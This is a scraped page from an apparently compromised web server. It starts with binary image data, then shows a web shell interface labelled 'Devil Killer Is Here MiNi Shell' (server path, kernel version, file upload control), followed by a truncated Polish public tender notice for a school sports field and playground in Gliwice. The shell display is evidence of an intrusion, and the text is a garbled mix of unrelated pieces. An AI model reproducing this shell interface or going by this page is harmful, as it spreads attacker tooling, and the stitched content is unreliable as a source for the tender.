JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220519/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20220519/0016869901-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Szkoła Podstawowa nr 2 w Gliwicach. Budowa Boiska Szkolnego oraz placu zabaw wraz z terenami towarzyszącymi </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">SZKOŁA PODSTAWOWA NR 2 W GLIWICACH</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000721580</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Lewkonii 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gliwice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">44-152</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL229 - Gliwicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">32/2378623</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@sp2.gliwice.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://gliwicesp2.edupage.org/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Szkoła Podstawowa nr 2 w Gliwicach. Budowa Boiska Szkolnego oraz placu zabaw wraz z terenami towarzyszącymi </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-17758e92-d79d-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00168699</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-05-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00009381/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Modernizacja boisk szkolnych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://sp2.bip.gliwice.eu/zamowieniaPubliczne <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1)komunikacja miedzy<br/>Zamawiającym a Wykonawcami odbywa się przy użyciu miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/, ePUAPu,<br/>dostępnego pod adresem: https://epuap.gov.pl/wps/portal oraz poczty elektronicznej<br/>2) Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do komunikacji”,<br/>3) wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z miniPortalu https://miniportal.uzp.gov.pl/WarunkiUslugi oraz Warunkach k o r z y s t a n i a z e l e k t r o n i c z n e j p l a t f o r m y u s ł u g a d m i n i s t r a c j i p u b lic z n ej ( e P U A P )<br/>https://www.gov.pl/web/gov/warunki-korzystania,4) maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych<br/>formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB,5) za datę<br/>przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub<br/>oświadczeń oraz innych informacji przyjmuje się datę ich przekazania</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacja zawarta w rozdziale 27. SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">Sp2.26.1.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Szczegółowy opis przedmiotu zamówienia zawarty został w :<br/>- załączniku 6.1 do SWZ - dokumentacji: „Budowa boiska szkolnego oraz placu zabaw wraz terenami<br/>towarzszacymi” opracownej przez RENSTUDIO ;<br/>- załączniku nr 6.2 do SWZ : specyfikacjach technicznych wykonania i odbioru robót;<br/>- przedmiarach robót stanowiących załącznik nr 6.3 do SWZ.<br/>Zakres rzeczowy robót ujęty w przedmiarach robót należy traktować jako orientacyjny, Wykonawca uwzględni<br/>w ofercie całość robót niezbędnych do prawidłowego wykonania zmówienia w tym roboty, które nie zostały<br/>wyszczególnione w przedmiarach robót a są konieczne do realizacji przedmiotu umowy zgodnie z „sztuką<br/>budowlaną” i obowiązującymi przepisami.<br/>Ze względu na charakter obiektu, w którym będą prowadzone roboty remontowo-budowlane Zamawiający<br/>oczekuje od Wykonawcy doświadczenia w prowadzeniu robót remontowo-budowlanych w czynnych<br/>placówkach oświatowych. W celu zapoznania się z miejscem i zakresem rzeczowym robót objetych<br/>postepowaniem Zamawiający wymaga odbycia wizji lokalnej. W celu umożliwienia zainteresowanym odbycia<br/>wizji lokalnej, , Zamawiajacy ustala termin wizji na dzień 24 i 27 maja 2022 o god.z 12.00.. Do oferty<br/>wymagane jest złożenie oświadczenia o odbyciu wizji lokalnej o treści załacznika nr 21 do SWZ. W przypadku<br/>braku odbycia wizji Zamawiający odrzuci ofertę Wykonawcy zgodnie z art. 226 ust.1 pkt.18 ustawy Pzp.<br/>W przypadku wykonawców wystepujących wspólnie, wymagane jest aby przynajmniej jeden z Wykonawców<br/>uczestniczył w wizji.<br/>Wykonawca, dodatkowo w ramach realizacji przedmiotu zamówienia podejmie niezbędne działania w celu<br/>ochrony mienia placówki. W tym celu m. in. zabezpieczy w razie potrzeby teren i sąsiadujące pomieszczenia<br/>przed zapyleniem w trakcie realizacji robót i na bieżąco będzie utrzymywał porządek. Ze względów<br/>organizacyjnych Zamawiający przewidział możliwość realizacji zamówienia wyłącznie w sposób nie kolidujący<br/>z funkcjonowaniem placówki, w okresie wolnym od zajęć dydaktyczno - wychowawczych.<br/>Przedstawione w ww. dokumentach wskazania na urządzenia techniczne i materiały z podaniem producenta<br/>należy traktować jako odniesienie do oczekiwanych przez zamawiającego parametrów technicznych<br/>i użytkowych i przykładowe ze względu na zasady ustawy Prawo zamówień publicznych (t. j. Dz. U. z 2019 r.<br/>poz. 2019 z póź. zm. ).<br/>Oznacza to, że wykonawcy mogą zaproponować inne niż wyszczególnione w dokumentacji rozwiązania<br/>z zachowaniem, odpowiednich równoważnych parametrów technicznych dla osiągnięcia oczekiwanej<br/>funkcjonalności całego układu będącego przedmiotem zamówienia z zapewnieniem uzyskania wszelkich<br/>ewentualnie wymaganych uzgodnień w tym zaakceptowania zmian materiałowych przez Zamawiającego<br/>i projektanta. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45453000-7 - Roboty remontowe i renowacyjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45223000-6 - Roboty budowlane w zakresie konstrukcji</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45112710-5 - Roboty w zakresie kształtowania terenów zielonych</p> <p class="mb-0">45233200-1 - Roboty w zakresie różnych nawierzchni</p> <p class="mb-0">45212221-1 - Roboty budowlane związane z obiektami na terenach sportowych</p> <p class="mb-0">45112723-9 - Roboty w zakresie kształtowania placów zabaw</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja i rękojmia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie zawodowe kierownika budowy/projektu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Zdolność do występowania w obrocie gospodarczym<br/>Określenie warunku:<br/>Zamawiający nie określa szczegółowego warunku w tym zakresie.<br/>2. Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z<br/>odrębnych przepisów<br/>Określenie warunku:<br/>Zamawiający nie określa szczegółowego warunku w tym zakresie.<br/>3. Sytuacja finansowa lub ekonomiczna<br/>Określenie warunku:<br/>O zamówienie mogą ubiegać się wykonawcy, których sytuacja ekonomiczna i finansowa pozwoli<br/>na prawidłowe wykonanie zamówienia<br/>1. Posiada środki finansowe lub zdolność kredytową w wysokości min. 1 900 000,00 zł brutto (słownie: jeden<br/>miliony dziewięćset tysięcy złotych) udokumentowane w okresie nie wcześniejszym niż 1 miesiąc przed<br/>upływem terminu składania ofert.<br/>2. Osiągnął w ostatnich 3 latach obrotowych przychód ze sprzedaży w wysokości nie mniejszej niż 10 000<br/>000,00 zł (dziesięć milionów zł) netto w każdym roku obrotowym, a jeżeli okres prowadzenia działalności jest<br/>krótszy to w tym okresie.<br/>3. Posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie<br/>prowadzonej działalności, przy czym minimalna suma gwarancyjna ubezpieczenia nie może być niższa<br/>od oferowanej ceny wykonania zamówienia przez Wykonawcę.<br/>4. Zdolność techniczna lub zawodowa<br/>Określenie warunku:<br/>O zamówienie mogą ubiegać się wykonawcy, których wiedza i doświadczenie pozwoli na prawidłowe<br/>wykonanie zamówienia.<br/>Wykonawca musi wykazać, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli<br/>okres prowadzenia działalności jest krótszy - w tym okresie wykonał zgodnie z zasadami sztuki budowlanej<br/>i prawidłowo ukończył realizację co najmniej:<br/>-co najmniej trzech robót budowlanych związnych z zagospodarowaniem terenu w zakresie budowy,<br/>przebudowy lub modernizacji obiektu sportowego składajacego się z boiska oraz bieżni i skoczni<br/>o nawierzchni syntetycznej, wykonanej w obrębie czynnych obiektów użyteczności publicznej zgodnie z klasą<br/>PKOB 1263 o wartości nie mniejszej niż 1 500 000,00 zł brutto zł każdej z wykonanych robót.<br/>- minimum trzech robót budowlanych polegających na budowie placu zabaw z nawierzchnią syntetyczną<br/>W przypadku podmiotów działających wspólnie doświadczenie podlega sumowaniu.<br/>O zamówienie mogą ubiegać się wykonawcy, których potencjał techniczny pozwoli na prawidłowe wykonanie<br/>zamówienia,<br/>O zamówienie mogą ubiegać się wykonawcy, którzy dysponują lub będą dysponować osobami zdolnymi<br/>do wykonania zamówienia. Wykonawca musi mieć do dyspozycji odpowiednio wykwalifikowany personel<br/>w tym:<br/>- jedną osobą, która przy realizacji zamówienia będzie pełniła funkcję kierownika budowy/kierownika projektu,<br/>posiadającą uprawnienia budowlane w specjalności konstrukcyjno-budowlanej bez ograniczeń i co najmniej<br/>10-letnie doświadczenie w kierowaniu robotami budowlanymi w ww. specjalności oraz posiada doświadczenie,<br/>w okresie ostatnich pięciu lat przed upływem terminu składania ofert, w kierowaniu minimum dwoma robotami<br/>budowlanymi związnych z agospodarowaniem terenu , polegających na budowie/przebudowie lub<br/>modernizacji obiektu sportowego składającego się co najmniej z boiska, biezni, skoczni o naiwerzchni<br/>syntetycznej, wykonanych terenie czynnego obiektu użyteczności publicznej zgodnie z klasą PKOB 1263,<br/>o wartości nie mniejszej niż 1 500 000,00 zł brutto zł wykonanych robót;<br/>- jedną osobą, która przy realizacji zamówienia będzie pełniła funkcję kierownika robót branży sanitarnej,<br/>posiadająca uprawnienia budowlane w specjalności instalacyjno - inżynieryjnej w zakresie instalacji<br/>sanitarnych lub równorzędne i co najmniej 5-letnie doświadczenie w kierowaniu robotami budowlanymi w ww.<br/>specjalności;<br/>- jedną osobą, która przy realizacji zamówienia będzie pełniła funkcję kierownika robót branży elektrycznej,<br/>posiadającą uprawnienia budowlane w specjalności instalacyjno - inżynieryjnej w zakresie instalacji<br/>elektrycznych lub równorzędne i co najmniej 5 -letnie doświadczenie w kierowaniu robotami budowlanymi<br/>w ww. specjalności;<br/>. W okresie ostatnich trzech lat przed upływem składania ofert, a jeżeli okres prowadzenia działalności jest<br/>krótszy to w tym okresie, posiadał przeciętne zatrudnienie min. 15 pracowników w każdym roku.<br/>5. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia,<br/>wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych<br/>z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>W takim przypadku wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio<br/>do wniosku o dopuszczenie do udziału w postępowaniu albo do oferty oświadczenie, z którego wynika, które<br/>roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy.<br/>6. W przypadku podania kwot w walucie obcej, zamawiający dokona przeliczenia tej wartości na wartość<br/>w złotych według średniego kursu NBP dla danej waluty z dnia zamieszczenia ogłoszenia w Biuletynie<br/>Zamówień Publicznych. Jeżeli w dniu ukazania się ogłoszenia o zamówieniu, NBP nie opublikuje informacji<br/>o średnim kursie walut, Zamawiający dokona odpowiednich przeliczeń wg średniego kursu z pierwszego,<br/>kolejnego dnia, w którym NBP opublikuje ww. informacje. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykaz oświadczeń, które wykonawca składa wraz z ofertą:<br/>1. oświadczenie o niepodleganiu wykluczeniu oraz spełnieniu warunków udziału w postępowaniu<br/>2.zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych<br/>podmiotów.<br/>Na wezwanie:<br/>odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacjio Działalności Gospodarczej<br/>2.oświadczenie wykonawcy, w zakresie art. 108 ust 1 pkt 5 ustawy pzp, o braku przynależności do tej samej grupy kapitałowej<br/>3.oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy pzp</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz oświadczeń, które wykonawca składa wraz z ofertą:<br/>1. oświadczenie o niepodleganiu wykluczeniu oraz spełnieniu warunków udziału w postępowaniu<br/>2.zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych<br/>podmiotów.<br/>Na wezwanie<br/>1. oświadczenie wykonawcy o rocznym przychodzie wykonawcy<br/>2.informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzająca wysokość<br/>posiadanych środków finansowych lub zdolność kredytową wykonawcy<br/>3.dokumenty potwierdzające, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej<br/>4.wykaz robót budowlanych<br/>5.oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy<br/>6.wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie składa każdy<br/>z wykonawców wspólnie ubiegających się o zamówienie (np. konsorcjum, wspólnicy spółki cywilnej). Dokumenty te potwierdzają spełnianie<br/>warunków udziału w postępowaniu lub kryteriów selekcji oraz brak podstaw w zakresie, w którym każdy z wykonawców wykazuje spełnianie warunków<br/>udziału w postępowaniu lub kryteriów selekcji oraz brak podstaw wykluczenia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> zgodnie z zapisami &#34;Wzór Umowy&#34; - załącznik nr 4 do 